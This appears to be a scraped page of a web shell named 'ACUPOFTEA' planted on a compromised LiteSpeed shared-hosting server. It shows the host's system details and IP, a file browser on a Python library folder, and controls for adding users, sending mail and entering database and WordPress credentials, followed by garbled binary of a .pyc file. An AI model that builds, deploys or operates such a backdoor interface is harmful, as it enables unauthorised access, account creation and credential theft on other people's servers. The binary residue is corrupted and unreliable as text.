System
:
Linux server195.web-hosting.com 4.18.0-553.30.1.lve.el8.x86_64 #1 SMP Tue Dec 3 01:21:19 UTC 2024 x86_64
Software
:
LiteSpeed
Server
:
198.54.115.201
Domains
:
Cant read /etc/named.conf
Permission
:
[
drwxr-xr-x
]
:
/
lib64
/
python2.7
/
lib2to3
/
fixes
/
216.73.216.102
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for sunrisetraders.in made by tabagkayu.
Folder Name
File Name
File Content
File
fix_print.pyc
� {fc @ s� d Z d d l m Z d d l m Z d d l m Z d d l m Z d d l m Z m Z m Z m Z m Z e j d � Z d e j f d � � YZ d S( s Fixer for print. Change: 'print' into 'print()' 'print ...' into 'print(...)' 'print ... ,' into 'print(..., end=" ")' 'print >>x, ...' into 'print(..., file=x)' No changes are applied if print_function is imported from __future__ i ( t patcomp( t pytree( t token( t fixer_base( t Namet Callt Commat Stringt is_tuples"